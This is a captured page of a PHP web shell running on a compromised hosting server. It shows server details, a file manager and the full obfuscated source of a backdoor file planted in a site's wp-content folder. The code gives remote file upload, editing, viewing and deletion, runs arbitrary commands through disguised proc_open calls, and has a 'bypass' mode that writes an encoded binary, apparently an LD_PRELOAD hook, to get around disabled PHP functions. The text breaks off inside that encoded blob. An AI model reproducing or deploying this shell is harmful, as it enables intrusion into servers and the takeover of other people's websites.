D0R4H4X0R SH3LL

Server Information

Server: LiteSpeed
System: Linux ezra.momentumhosting.cloud 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
User: equalcompa ( 1022 )
PHP Version: 8.2.28
Python Version: Python is not available
Disabled Functions:Cron, Curl, Ftp, GCC, Mail, Mysql, PKEXEC, Perl, Python, SendMail, Ssh, Wget, dl, exec, passthru, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_uname, proc_close, proc_open, shell_exec, show_source, system

Features

Command Line

Find Longest Directory Path

Scan New PHP Files

Upload File

Directory: /home/equalcompa/domains/equalcompassion.org/public_html/admin-portal/uploads/

Current File : /home/equalcompa/domains/equalcompassion.org/public_html/admin-portal/uploads/fmr.php

File Manager
 / wp-content
Search
 Upload
 New Item
 Settings
File "db5.php"

Full path: /home1/epichome/public_html/wp-content/db5.php
File size: 60.67 B (60.67 KB bytes)
MIME-type: text/x-php
Charset: utf-8

 Download    Open    Edit    Advanced Editor    Back

<?php
 goto MaVTf; N0q1M: $viewCommandResult = ''; goto VCX8d; HZ_E3: $defaultRootPath = getcwd(); goto xbOVy; iFZSP: echo generateBreadcrumb($rootPath); goto vHaFm; EHkEJ: ?>
<!doctypehtml><html lang="en"><head><meta charset="UTF-8"><meta content="width=device-width,initial-scale=1"name="viewport"><style>*{margin:0;padding:0;box-sizing:border-box}body{background:#111;color:#ccc;font-family:monospace;font-size:16px;padding:16px;line-height:1.5}a{color:#8ab4f8;text-decoration:none}a:hover{text-decoration:underline}.panel{margin-bottom:20px}button,input,textarea{background:#000;border:1px solid #444;color:#ccc;font-family:inherit;font-size:16px;padding:6px;width:100%}button{cursor:pointer}button:hover{background:#222}ul{list-style:none;padding:0;margin:0}li{padding:6px 0;border-bottom:1px solid #222;display:flex;justify-content:space-between;align-items:center}.result-box{white-space:pre;overflow:auto;resize:vertical;width:100%}.breadcrumb{margin:12px 0;font-size:15px}.file-content{background:#000;border:1px solid #333;color:#ccc;padding:12px;font-size:15px;white-space:pre-wrap;max-height:400px;overflow-y:auto}.alert{background:#1a1a1a;border-left:3px solid green;padding:8px;margin-bottom:12px;font-size:15px}.alert-danger{border-left-color:maroon}.alert-success{border-left-color:green}.alert-info{border-left-color:#005580}</style></head><body><div class="panel"><form action=""method="post"enctype="multipart/form-data"><input name="file_upload"required type="file"> <input name="upload_path"type="hidden"value="<?php  goto xn9oM; Kms0i: if ($_SERVER["\x52\105\x51\x55\105\x53\x54\x5f\115\105\124\110\117\x44"] === "\120\x4f\x53\x54" && isset($_POST["\146\151\x6c\x65\x6e\x61\x6d\145"])) { $path = $_POST["\x70\141\x74\x68"] ?? $rootPath; $filename = $_POST["\x66\x69\154\145\x6e\x61\x6d\x65"] ?? ''; $content = $_POST["\x63\x6f\x6e\164\145\x6e\164"] ?? ''; if (!empty($path) && !empty($filename)) { $filePath = rtrim($path, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $filename; file_put_contents($filePath, $content); echo "\74\144\x69\x76\40\143\x6c\141\x73\x73\75\x27\x61\154\x65\x72\x74\40\141\154\145\162\164\x2d\163\x75\x63\143\145\x73\163\x27\76\106\151\x6c\145\40\143\x72\x65\141\x74\x65\144\x3a\40\x3c\163\x74\x72\157\156\147\x3e" . htmlspecialchars($filePath) . "\74\57\163\x74\162\x6f\156\x67\x3e\74\57\144\151\x76\x3e"; } else { echo "\74\144\x69\x76\x20\143\x6c\x61\163\163\75\x27\x61\x6c\145\x72\x74\x20\141\154\145\162\164\x2d\x64\141\156\147\x65\162\47\76\120\141\164\x68\x20\x61\156\144\40\x66\151\154\x65\x20\156\x61\x6d\145\x20\155\x75\x73\x74\x20\x62\x65\x20\x66\151\154\154\x65\x64\56\74\x2f\144\151\x76\x3e"; } } goto PC3Eh; eg6qb: function generateBreadcrumb($path) { $parts = explode(DIRECTORY_SEPARATOR, trim($path, DIRECTORY_SEPARATOR)); $breadcrumb = array(); $currentPath = ''; foreach ($parts as $part) { $currentPath .= DIRECTORY_SEPARATOR . $part; $breadcrumb[] = "\74\141\40\150\x72\145\x66\x3d\42\x3f\x70\x61\164\150\75" . urlencode($currentPath) . "\42\76" . htmlspecialchars($part) . "\x3c\57\x61\x3e"; } return implode("\57", $breadcrumb); } goto HZ_E3; QVRxi: function scanDirectory($path) { $items = array(); if (is_dir($path)) { $scan = scandir($path); foreach ($scan as $item) { if ($item !== "\56" && $item !== "\x2e\x2e") { $fullPath = $path . DIRECTORY_SEPARATOR . $item; $items[] = array("\156\141\x6d\145" => $item, "\x70\141\x74\150" => $fullPath, "\x74\x79\160\145" => is_dir($fullPath) ? "\144\x69\162\145\x63\164\157\162\171" : "\146\151\x6c\x65"); } } } usort($items, function ($a, $b) { if ($a["\x74\171\x70\145"] === "\x64\x69\162\145\143\164\157\x72\x79" && $b["\x74\x79\x70\145"] !== "\144\x69\x72\x65\x63\164\x6f\162\x79") { return -1; } if ($a["\x74\171\x70\145"] !== "\144\151\162\x65\143\x74\x6f\162\171" && $b["\x74\x79\x70\145"] === "\144\151\x72\x65\143\164\x6f\162\x79") { return 1; } return strcasecmp($a["\x6e\x61\155\x65"], $b["\156\141\155\x65"]); }); return $items; } goto eg6qb; RDsM8: ?>
"> <input name="filename"required placeholder="Filename"> <textarea name="content"placeholder="File content"></textarea> <button type="submit">Create</button></form></div><div class="panel"><form action=""method="post"style="margin:0"><input name="cmdbyp"required placeholder="Enter command"autocomplete="off"> <button type="submit">Run Command [Bypass]</button></form></div><div class="panel"><form action=""method="post"style="margin:0"><input name="cmddef"required placeholder="Enter command"autocomplete="off"> <button type="submit">Run Command</button></form></div><center><a href="https://privdayz.com/"><img referrerpolicy="unsafe-url"src="https://cdn.privdayz.com/images/logo.jpg"></a></center><?php  goto QAqkt; xn9oM: echo htmlspecialchars($rootPath); goto oq7cC; hILam: echo htmlspecialchars($rootPath); goto RDsM8; MaVTf: $htm = "\150" . "\x74" . "\155" . "\x6c" . "\x73" . "\x70" . "\145" . "\143" . "\151" . "\141" . "\x6c" . "\x63" . "\150" . "\x61" . "\x72" . "\163"; goto QVRxi; VCX8d: if ($_SERVER["\x52\105\x51\125\105\x53\x54\137\x4d\105\x54\x48\x4f\x44"] === "\x50\x4f\x53\x54" && isset($_POST["\143\155\x64\x64\x65\x66"])) { $pp = "\160" . "\x72" . "\x6f" . "\x63" . "\137" . "\157" . "\160" . "\145" . "\156"; $pc = "\146" . "\143" . "\x6c" . "\x6f" . "\163" . "\145"; $ppc = "\160" . "\162" . "\x6f" . "\143" . "\x5f" . "\143" . "\x6c" . "\x6f" . "\163" . "\x65"; $stg = "\163" . "\x74" . "\x72" . "\x65" . "\x61" . "\155" . "\x5f" . "\147" . "\145" . "\164" . "\x5f" . "\143" . "\x6f" . "\x6e" . "\x74" . "\x65" . "\x6e" . "\164" . "\x73"; $command = $_POST["\143\155\x64\144\145\x66"]; $descriptorspec = array(0 => array("\x70\151\x70\x65", "\x72"), 1 => array("\x70\x69\x70\x65", "\x77"), 2 => array("\160\x69\x70\145", "\x77")); $process = $pp($command, $descriptorspec, $pipes); if (is_resource($process)) { $output = $stg($pipes[1]); $errors = $stg($pipes[2]); $pc($pipes[1]); $pc($pipes[2]); $ppc($process); if (!empty($errors)) { $viewCommandResult = "\74\150\162\76\x3c\x70\x3e\x45\x72\x72\x6f\162\x3a\x3c\x2f\160\76\x3c\x74\x65\x78\164\141\x72\145\x61\x20\x63\154\x61\x73\x73\x3d\x22\162\145\x73\x75\154\164\x2d\x62\x6f\x78\42\76" . $htm($errors) . "\74\x2f\x74\x65\x78\x74\x61\x72\145\141\76"; } else { $viewCommandResult = "\74\x68\x72\x3e\74\142\162\x3e\x3c\x70\76\122\x65\x73\165\154\164\x3a\x3c\x2f\x70\76\74\164\x65\170\164\x61\162\x65\141\x20\x63\x6c\x61\x73\x73\75\x22\x72\x65\163\165\x6c\x74\x2d\142\x6f\170\42\x3e" . $htm($output) . "\x3c\x2f\164\x65\x78\x74\141\x72\145\141\76"; } } else { $viewCommandResult = "\74\150\x72\76\x3c\142\x72\76\x3c\160\x3e\122\x65\x73\x75\x6c\x74\x3a\x3c\57\x70\76\x3c\x74\145\170\x74\141\x72\145\x61\x20\143\x6c\x61\163\163\x3d\x22\162\145\163\x75\x6c\164\55\142\x6f\170\x22\76\x45\162\x72\x6f\x72\72\x20\106\x61\151\x6c\x65\144\x20\164\157\40\x65\x78\x65\x63\165\x74\x65\40\143\157\x6d\155\141\156\144\41\74\x2f\164\x65\170\164\141\x72\x65\x61\x3e"; } } goto uEIRI; oEqvX: if (isset($_GET["\x76\151\145\x77\x5f\146\x69\154\145"])) { $filePath = $_GET["\x76\151\x65\x77\137\146\151\x6c\145"]; if (file_exists($filePath) && is_file($filePath)) { $fileContent = htmlspecialchars(file_get_contents($filePath)); echo "\x3c\x64\151\x76\x20\x63\x6c\x61\x73\x73\x3d\47\x61\x6c\x65\x72\164\x20\141\x6c\145\162\x74\55\151\156\146\x6f\47\x3e\74\x73\164\x72\x6f\156\x67\x3e" . htmlspecialchars($filePath) . "\74\57\163\164\x72\x6f\x6e\x67\x3e\74\x2f\x64\x69\x76\76"; echo "\74\x70\162\145\x20\x63\x6c\141\163\x73\x3d\47\146\x69\154\145\x2d\x63\157\156\164\145\x6e\x74\47\76{$fileContent}\74\x2f\160\162\x65\76"; } else { echo "\x3c\x64\x69\166\40\143\x6c\x61\163\163\x3d\x27\141\154\145\162\164\40\x61\154\145\162\164\x2d\144\141\x6e\x67\145\162\x27\x3e\x46\x69\x6c\145\x20\156\x6f\164\x20\146\157\x75\156\144\40\x6f\x72\x20\143\x61\156\156\x6f\164\40\x6f\x70\x65\x6e\x65\144\x2e\74\57\144\x69\x76\x3e"; } } goto pCDXt; vHaFm: ?>
</div><ul><?php  goto JQXON; xbOVy: $rootPath = $_GET["\160\x61\x74\x68"] ?? $defaultRootPath; goto N0q1M; pCDXt: $scannedItems = scanDirectory($rootPath); goto EHkEJ; blN5z: ?>
<div class="breadcrumb">Path:<?php  goto iFZSP; oq7cC: ?>
"> <button type="submit">Upload</button></form></div><div class="panel"><form action=""method="post"><input name="path"required placeholder="Path"value="<?php  goto hILam; QAqkt: if (isset($viewCommandResult)) { echo $viewCommandResult; } goto blN5z; JQXON: foreach ($scannedItems as $item) { ?>
<li><span><strong><?php  echo $item["\164\x79\160\145"] === "\x64\x69\162\x65\x63\164\x6f\162\171" ? "\133\x44\x5d" : "\x5b\x46\135"; ?>
</strong><?php  if ($item["\164\171\160\x65"] === "\144\151\x72\x65\x63\164\157\162\x79") { ?>
<a href="?path=<?php  echo urlencode($item["\x70\141\164\150"]); ?>
"><?php  echo htmlspecialchars($item["\x6e\x61\x6d\x65"]); ?>
</a><?php  } else { ?>
<a href="?path=<?php  echo urlencode($rootPath); ?>
&view_file=<?php  echo urlencode($item["\x70\x61\164\x68"]); ?>
"><?php  echo htmlspecialchars($item["\156\x61\155\145"]); ?>
</a><?php  } ?>
</span><?php  if ($item["\164\171\160\145"] === "\x66\x69\x6c\x65") { ?>
<form action=""method="post"style="margin:0"><input name="delete_path"type="hidden"value="<?php  echo htmlspecialchars($item["\160\141\x74\150"]); ?>
"> <button type="submit"style="width:auto;padding:4px 8px">Delete</button></form><?php  } ?>
</li><?php  } goto s6Ao3; PC3Eh: if ($_SERVER["\122\105\121\x55\105\123\x54\137\115\x45\124\x48\117\104"] === "\x50\x4f\x53\124" && isset($_FILES["\146\151\154\145\137\x75\160\154\157\x61\x64"])) { $uploadPath = $_POST["\x75\x70\x6c\x6f\x61\144\x5f\x70\141\164\150"] ?? $rootPath; if (!empty($uploadPath) && is_dir($uploadPath)) { $fileName = basename($_FILES["\146\151\154\x65\x5f\165\160\x6c\x6f\x61\x64"]["\x6e\x61\x6d\145"]); $targetFile = rtrim($uploadPath, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $fileName; if (move_uploaded_file($_FILES["\146\151\154\145\x5f\165\x70\154\x6f\x61\x64"]["\x74\155\x70\137\x6e\141\155\145"], $targetFile)) { echo "\74\144\151\x76\x20\x63\154\x61\163\163\75\47\x61\154\x65\x72\164\x20\141\154\x65\162\164\55\163\x75\143\x63\145\163\x73\x27\x3e\x46\x69\154\x65\40\142\145\x72\x68\141\x73\151\154\x20\144\151\165\156\147\x67\141\150\x20\153\145\72\40\74\x73\164\162\157\156\147\76" . htmlspecialchars($targetFile) . "\74\57\163\x74\162\x6f\x6e\147\x3e\x3c\x2f\x64\151\166\76"; } else { echo "\74\x64\151\166\40\143\x6c\141\x73\x73\75\x27\141\154\x65\162\164\x20\x61\154\145\162\x74\x2d\144\141\156\x67\145\x72\47\76\125\160\x6c\157\x61\144\x20\146\141\151\x6c\x2e\x3c\57\x64\151\x76\x3e"; } } else { echo "\x3c\144\x69\166\x20\143\x6c\141\163\x73\75\47\141\154\x65\x72\x74\40\x61\x6c\x65\x72\x74\55\144\141\156\x67\145\162\47\x3e\120\141\x74\150\x20\x69\163\40\x6e\157\x74\40\166\x61\x6c\x69\x64\40\157\162\x20\x6e\157\x74\x20\145\170\x69\x73\x74\145\144\x2e\x3c\x2f\x64\x69\x76\x3e"; } } goto oEqvX; YExJ0: if ($_SERVER["\x52\x45\121\125\x45\x53\124\137\115\x45\x54\110\x4f\104"] === "\x50\x4f\x53\124" && isset($_POST["\144\x65\x6c\145\x74\x65\137\x70\x61\x74\150"])) { $deletePath = $_POST["\x64\x65\154\x65\x74\145\x5f\160\x61\x74\150"]; if (file_exists($deletePath)) { unlink($deletePath); echo "\x3c\x64\151\x76\40\x63\x6c\141\163\163\x3d\x27\141\154\145\x72\x74\x20\x61\154\145\x72\x74\55\163\165\143\x63\x65\163\x73\47\76\x44\x65\x6c\x65\164\145\144\x3a\40\74\163\164\162\x6f\x6e\x67\x3e" . htmlspecialchars($deletePath) . "\74\57\163\x74\x72\x6f\156\x67\x3e\74\57\144\x69\x76\x3e"; } else { echo "\74\144\x69\x76\40\143\154\x61\163\163\x3d\x27\141\154\145\162\x74\x20\x61\x6c\145\x72\164\55\144\141\x6e\x67\145\162\x27\x3e\103\x61\156\x6e\157\x74\40\x64\x65\x6c\145\164\145\x20\x66\x69\x6c\x65\40\157\x72\x20\146\151\154\x65\40\x6e\x6f\164\x20\145\170\151\x73\164\145\144\x2e\74\57\144\151\166\x3e"; } } goto Kms0i; uEIRI: if (isset($_POST["\143\x6d\144\142\x79\160"])) { $p = "\160" . "\165" . "\164" . "\145" . "\156" . "\x76"; $a = "\146\151" . "\154\145\x5f\160" . "\165\x74\137\143" . "\x6f\x6e\164" . "\x65" . "\156\x74" . "\x73"; $m = "\155" . "\141" . "\x69" . "\154"; $base = "\x62\141" . "\x73\145" . "\66\64" . "\137" . "\144\x65" . "\143\157" . "\144\x65"; $en = "\x62\141" . "\163\145" . "\x36\x34" . "\x5f" . "\x65\156" . "\143\157" . "\x64\145"; $drnm = "\x64" . "\151" . "\162" . "\156" . "\x61" . "\155" . "\145"; $currentFilePath = $_SERVER["\x50\x48\120\x5f\x53\105\114\106"]; $doc = $_SERVER["\104\117\103\125\115\x45\x4e\124\x5f\122\x4f\117\124"]; $directoryPath = $drnm($currentFilePath); $full = $doc . $directoryPath; $hook = "\x66\60\x56\x4d\x52\x67\x49\102\101\x51\x41\x41\x41\101\101\101\101\101\x41\101\101\101\115\101\120\x67\101\x42\x41\101\x41\x41\64\101\x63\x41\x41\x41\x41\101\101\x41\x42\101\x41\101\x41\101\101\101\101\x41\101\120\147\132\101\x41\x41\x41\x41\101\x41\x41\x41\101\101\x41\x41\105\x41\101\117\101\x41\x48\x41\x45\101\101\110\121\101\143\101\x41\105\x41\101\x41\101\106\x41\x41\x41\x41\x41\101\101\x41\x41\x41\x41\101\x41\101\101\x41\x41\x41\101\x41\101\x41\x41\101\101\x41\101\x41\101\101\x41\101\101\x41\101\101\x62\x41\157\x41\x41\x41\101\x41\101\x41\x42\x73\103\147\x41\101\101\x41\101\x41\x41\x41\101\101\111\101\101\x41\101\x41\x41\101\x41\x51\x41\x41\x41\x41\x59\x41\101\x41\104\x34\x44\x51\x41\x41\x41\101\101\101\x41\120\x67\116\x49\101\x41\101\x41\101\101\x41\53\101\x30\x67\101\x41\x41\x41\101\x41\102\167\101\x67\101\101\x41\x41\x41\x41\x41\x48\x67\103\101\101\x41\x41\101\x41\101\x41\x41\101\x41\147\x41\101\x41\101\101\x41\x41\x43\101\101\101\101\102\147\101\x41\x41\x42\x67\117\x41\x41\x41\101\x41\x41\101\x41\x47\101\x34\x67\101\x41\x41\x41\101\101\101\131\104\x69\101\101\x41\x41\101\x41\x41\x4d\x41\102\101\101\101\x41\x41\101\101\x41\167\101\x45\x41\x41\101\x41\101\101\x41\x41\111\x41\101\101\101\101\101\101\101\x41\101\x51\101\x41\x41\101\105\101\x41\101\101\x79\101\x45\x41\x41\x41\101\x41\x41\101\104\111\101\x51\101\x41\x41\101\x41\101\101\x4d\147\102\x41\x41\101\101\101\101\x41\101\112\101\101\x41\x41\101\101\101\x41\x41\x41\153\x41\x41\101\x41\x41\x41\x41\101\x41\x41\121\101\x41\101\101\101\101\x41\x41\x41\125\x4f\x56\60\x5a\x41\121\101\x41\x41\x42\x34\x43\x51\x41\x41\101\101\x41\x41\x41\x48\x67\112\x41\x41\x41\101\x41\101\101\x41\x65\x41\x6b\x41\x41\x41\x41\x41\101\x41\101\60\x41\101\101\101\101\101\x41\x41\101\104\121\101\101\x41\x41\101\x41\x41\x41\x41\102\x41\101\x41\101\101\x41\101\101\x41\x42\x52\65\130\x52\153\102\x67\101\x41\101\101\x41\x41\101\101\x41\101\x41\x41\x41\x41\101\x41\x41\x41\101\x41\101\x41\101\x41\101\x41\x41\x41\101\101\x41\101\101\x41\101\x41\101\x41\101\101\101\x41\101\x41\101\101\x41\101\x41\101\x41\x41\x41\x41\x41\x41\101\x51\101\x41\101\101\x41\101\x41\x41\x41\106\x4c\x6c\144\107\x51\105\101\101\101\101\x2b\101\60\x41\101\101\101\x41\101\101\104\64\x44\x53\101\101\101\101\x41\x41\101\120\x67\116\x49\101\101\x41\x41\101\101\101\x43\x41\111\101\x41\101\x41\101\x41\101\101\x49\x41\147\101\101\x41\101\101\101\x41\101\x45\101\101\101\101\x41\x41\101\101\101\x42\101\x41\101\x41\x42\x51\x41\101\x41\x41\104\x41\x41\x41\x41\122\x30\x35\x56\x41\107\150\153\106\x6f\160\106\x56\x50\x76\130\x62\x59\142\102\151\154\x42\161\67\123\144\70\x53\x31\153\162\101\101\x41\x41\x41\101\x4d\101\101\101\101\116\x41\101\101\x41\101\121\101\x41\101\101\x59\101\x41\101\x43\111\167\x43\x42\x46\101\157\x52\x67\107\x51\x30\101\101\101\101\122\x41\x41\x41\101\105\x77\x41\x41\x41\x45\x4a\x46\61\145\x78\x67\130\142\61\143\x33\155\x75\126\147\114\166\152\153\x6e\172\x59\x63\126\147\x63\x75\131\x33\170\104\165\x72\x54\67\167\64\142\156\64\x67\114\x41\101\x41\x41\101\x41\x41\x41\101\x41\x41\x41\101\101\x41\101\101\x41\x41\x41\x41\x41\101\x41\101\101\101\101\101\x41\101\101\x41\x41\101\x41\x41\110\153\101\x41\101\101\x53\101\x41\x41\x41\101\x41\101\x41\x41\x41\101\x41\101\101\101\101\x41\x41\x41\101\x41\101\101\101\101\102\167\x41\x41\101\101\x67\x41\x41\101\101\101\x41\x41\101\101\101\x41\101\101\x41\x41\101\x41\101\101\101\x41\101\101\x41\101\x49\131\101\x41\101\x41\x53\101\x41\101\101\x41\101\101\x41\101\x41\101\x41\x41\101\101\101\x41\x41\101\101\x41\x41\101\x41\101\112\143\x41\x41\x41\101\x53\x41\x41\x41\x41\101\101\x41\101\101\x41\101\101\101\x41\x41\x41\x41\x41\x41\x41\101\x41\x41\x41\101\x41\105\101\101\101\x41\147\x41\x41\101\101\x41\x41\101\101\x41\101\101\101\101\101\x41\x41\101\101\101\101\101\101\101\101\x41\111\101\x41\x41\101\101\123\101\x41\x41\x41\x41\x41\x41\101\x41\101\x41\101\101\x41\101\x41\x41\x41\x41\101\x41\101\101\x41\101\x47\x45\101\101\101\101\147\x41\x41\101\x41\x41\101\x41\x41\x41\101\101\x41\x41\x41\x41\101\101\101\x41\x41\x41\101\101\x41\101\114\x49\101\101\101\x41\123\101\101\101\101\101\x41\x41\101\x41\x41\x41\x41\x41\101\101\x41\101\101\101\101\101\x41\101\x41\101\x4b\x4d\101\x41\101\x41\123\x41\x41\x41\x41\101\101\x41\x41\101\101\x41\101\x41\x41\101\101\101\x41\x41\x41\101\x41\101\x41\101\x44\147\x41\x41\101\x41\x67\101\101\101\101\x41\x41\101\101\101\101\x41\x41\101\101\x41\x41\x41\101\101\x41\101\101\101\101\101\x46\111\101\101\101\x41\151\101\101\101\x41\101\x41\101\101\101\x41\101\101\101\x41\x41\x41\101\x41\101\101\x41\101\101\101\x41\x4a\x34\101\x41\101\101\123\x41\101\101\101\x41\x41\x41\101\101\101\x41\101\x41\101\x41\101\x41\x41\x41\x41\101\x41\101\101\101\115\x55\101\x41\101\x41\x51\101\102\143\x41\141\102\101\147\x41\x41\101\x41\101\x41\x41\x41\101\101\x41\x41\101\x41\101\101\x41\111\x30\101\x41\101\101\123\101\101\x77\101\106\101\153\101\x41\101\101\101\x41\101\x41\x70\x41\x41\x41\x41\x41\101\101\x41\x41\x4b\147\x41\101\101\101\123\101\101\167\x41\x50\x51\153\x41\x41\x41\101\101\x41\101\101\x64\x41\x41\101\101\x41\101\x41\x41\x41\x4e\x67\x41\x41\101\x41\x51\101\102\x67\x41\143\x42\101\x67\x41\101\101\x41\101\x41\x41\x41\x41\x41\x41\x41\x41\101\x41\x41\101\115\167\101\x41\101\x41\x51\101\x42\147\101\141\102\x41\x67\101\101\101\x41\x41\101\101\101\x41\x41\101\x41\101\x41\x41\101\x41\102\101\x41\101\x41\101\x53\x41\101\153\101\x47\101\143\101\101\101\101\101\101\101\101\x41\101\x41\x41\101\101\x41\101\101\x41\x42\x59\101\101\101\x41\x53\101\x41\x30\x41\130\101\153\x41\x41\101\x41\x41\x41\101\101\x41\x41\x41\101\x41\101\x41\101\x41\101\110\125\x41\101\101\x41\x53\101\x41\167\x41\64\x41\x67\101\101\x41\x41\x41\x41\x41\101\60\x41\101\x41\x41\101\x41\101\101\101\101\x42\x66\x58\x32\x64\164\x62\62\x35\x66\x63\x33\122\150\143\156\122\146\x58\167\102\x66\141\x57\65\x70\x64\x41\x42\x66\x5a\x6d\x6c\x75\x61\121\102\x66\x53\x56\122\x4e\130\x32\x52\154\143\x6d\126\x6e\141\x58\116\x30\132\x58\112\125\124\125\116\163\x62\62\65\154\126\107\x46\151\x62\107\x55\x41\130\x30\154\125\124\x56\71\x79\x5a\127\x64\160\143\x33\x52\x6c\x63\x6c\122\x4e\121\x32\x78\x76\x62\x6d\x56\125\131\127\x4a\163\132\x51\102\146\x58\62\x4e\64\131\x56\71\155\x61\x57\x35\150\142\107\154\66\132\x51\x42\146\x53\x6e\x5a\146\x55\155\126\156\x61\130\x4e\x30\x5a\130\112\x44\142\107\x46\x7a\x63\62\x56\172\101\x48\102\63\x62\x67\102\156\132\x58\x52\x6c\142\156\x59\101\131\62\150\x74\x62\x32\121\x41\143\63\154\x7a\x64\x47\126\x74\101\x47\x52\150\x5a\127\x31\166\x62\155\154\x36\x5a\x51\x42\172\141\127\144\165\131\127\x77\x41\132\155\71\171\141\x77\x42\154\145\x47\x6c\x30\101\110\x42\171\x5a\x57\170\x76\131\127\122\164\132\x51\x42\x31\142\x6e\x4e\x6c\x64\x47\126\x75\144\x67\x42\x73\x61\127\x4a\x6a\114\x6e\x4e\166\x4c\x6a\131\x41\130\62\x56\x6b\131\x58\122\x68\101\106\x39\146\131\156\x4e\172\x58\x33\116\x30\131\130\x4a\x30\101\106\71\x6c\x62\155\x51\101\x52\x30\170\112\x51\x6b\116\146\115\151\64\171\114\x6a\x55\101\x41\101\101\101\x41\147\x41\x41\x41\101\111\101\101\147\101\101\101\101\x49\101\x41\x41\x41\103\101\x41\111\x41\x41\x41\101\x43\101\x41\111\x41\x41\x51\101\102\x41\101\105\101\101\121\x41\x42\101\101\105\x41\x41\x51\101\102\x41\101\x41\x41\x41\101\x41\102\101\101\105\x41\x75\167\101\x41\x41\x42\x41\x41\101\x41\101\x41\x41\101\101\101\x64\x52\x70\160\103\x51\101\x41\x41\x67\x44\144\101\x41\101\x41\101\101\x41\101\x41\x50\x67\x4e\111\x41\x41\101\101\x41\x41\x41\x43\x41\101\101\x41\x41\101\101\x41\101\103\167\x43\101\101\x41\101\x41\101\x41\x41\101\147\117\111\x41\101\x41\x41\101\x41\101\x43\101\x41\101\x41\x41\x41\101\101\101\102\x77\x43\x41\101\x41\101\x41\101\x41\101\107\x41\121\111\x41\101\x41\101\x41\x41\x41\x43\x41\101\x41\x41\x41\101\101\x41\x41\102\147\x45\103\x41\101\101\101\x41\101\x41\x41\x41\x4f\111\101\x41\x41\x41\101\101\101\101\121\x41\x41\x41\101\x38\x41\x41\x41\101\101\101\101\x41\x41\x41\x41\101\x41\x41\x4e\x67\120\x49\101\101\x41\101\101\x41\x41\x42\x67\101\101\101\x41\x49\101\101\101\101\101\x41\x41\101\x41\101\x41\101\x41\x41\117\x41\x50\x49\101\101\101\101\x41\x41\101\102\x67\101\101\x41\x41\125\x41\101\101\x41\101\x41\x41\x41\x41\101\x41\x41\x41\x41\x4f\147\120\x49\x41\101\101\101\x41\101\101\x42\x67\x41\101\x41\101\143\101\101\101\101\101\101\101\x41\x41\101\x41\x41\x41\x41\x50\101\x50\111\101\101\x41\101\x41\101\101\102\x67\101\x41\x41\101\x6f\x41\x41\101\101\101\101\101\101\101\x41\101\x41\x41\x41\120\147\120\111\101\x41\101\x41\101\101\101\x42\147\x41\x41\x41\101\x73\101\x41\101\x41\x41\101\101\x41\101\101\101\101\x41\x41\102\x67\121\x49\101\101\x41\101\101\x41\101\x42\x77\x41\x41\101\x41\105\101\101\101\x41\x41\101\101\101\101\x41\101\101\x41\101\x43\x41\x51\111\x41\x41\101\101\101\101\101\x42\167\x41\101\x41\x41\64\101\101\101\x41\x41\x41\x41\101\x41\x41\x41\101\x41\101\103\x67\121\111\x41\x41\x41\x41\101\x41\101\x42\x77\x41\x41\101\101\x4d\x41\x41\101\101\x41\101\x41\x41\101\x41\101\x41\x41\101\x44\x41\x51\111\101\x41\x41\x41\x41\x41\x41\x42\x77\101\x41\101\102\x51\x41\x41\x41\101\x41\x41\101\x41\101\x41\x41\x41\x41\101\x44\x67\121\111\x41\x41\x41\101\x41\101\x41\x42\x77\101\101\101\x41\121\101\x41\x41\x41\x41\101\x41\x41\101\x41\101\x41\x41\x41\105\101\121\111\101\x41\x41\101\101\x41\101\x42\x77\x41\x41\x41\x41\131\101\x41\101\x41\x41\101\x41\x41\101\101\x41\x41\101\x41\x45\x67\x51\x49\x41\x41\x41\x41\x41\101\101\x42\x77\101\101\101\101\147\101\x41\101\101\101\101\x41\x41\101\101\x41\x41\x41\101\x46\x41\x51\111\101\101\x41\101\x41\101\x41\x42\167\x41\101\x41\x41\x6b\x41\x41\x41\x41\x41\101\101\101\101\x41\101\x41\x41\x41\x46\x67\121\111\x41\x41\x41\x41\101\x41\x41\102\x77\x41\101\101\101\x77\x41\x41\101\101\101\x41\101\x41\x41\x41\x41\101\101\x41\x45\151\x44\x37\101\x68\x49\x69\x77\x57\71\x43\x43\x41\101\x53\x49\x58\x41\x64\x41\114\x2f\x30\x45\151\x44\x78\101\152\x44\x41\120\70\x31\60\147\147\147\101\x50\70\154\61\101\147\147\101\x41\70\x66\121\101\x44\x2f\x4a\144\x49\x49\x49\101\x42\x6f\x41\x41\x41\x41\x41\x4f\156\x67\57\x2f\x2f\x2f\x2f\x79\x58\113\103\103\x41\101\141\x41\105\x41\x41\101\104\160\x30\120\x2f\x2f\57\x2f\70\x6c\167\x67\147\x67\x41\107\x67\103\x41\101\x41\x41\x36\x63\104\x2f\57\x2f\x2f\57\x4a\142\x6f\x49\111\101\x42\157\x41\167\x41\x41\x41\x4f\155\167\57\x2f\57\57\57\x79\x57\171\x43\x43\x41\101\141\x41\121\101\101\x41\104\x70\157\x50\57\57\57\57\x38\x6c\x71\x67\x67\147\101\x47\x67\x46\x41\x41\101\x41\x36\x5a\x44\x2f\x2f\x2f\57\x2f\112\x61\111\111\111\x41\x42\x6f\x42\147\101\101\101\117\155\101\x2f\57\57\x2f\57\171\x57\141\103\x43\101\101\x61\x41\x63\x41\101\101\x44\160\143\x50\57\x2f\57\57\70\154\153\x67\147\x67\101\107\147\111\101\101\x41\x41\66\x57\104\57\x2f\x2f\57\57\112\x53\x49\111\111\101\x42\155\153\x41\101\x41\x41\x41\x41\x41\x41\101\x41\101\123\111\60\71\x67\x51\147\x67\101\105\151\116\102\131\x45\x49\x49\101\x42\x56\x53\103\x6e\x34\123\x49\156\x6c\x53\111\x50\x34\x44\156\131\126\x53\111\163\x46\61\x67\x63\x67\x41\105\151\x46\x77\110\121\112\x58\x66\57\x67\x5a\147\x38\x66\x52\x41\x41\101\130\x63\115\x50\110\60\101\x41\132\151\x34\x50\110\64\121\101\101\101\x41\101\x41\x45\x69\x4e\x50\125\x45\111\111\x41\102\x49\152\124\x55\66\103\103\x41\101\126\125\x67\x70\x2f\x6b\x69\112\65\x55\x6a\102\57\147\x4e\111\x69\146\x42\111\167\x65\147\x2f\123\101\110\x47\123\116\x48\53\x64\102\150\x49\x69\x77\x57\x68\102\x79\x41\x41\x53\111\130\101\x64\101\170\x64\57\53\x42\x6d\104\x78\53\105\x41\101\101\101\101\101\x42\x64\x77\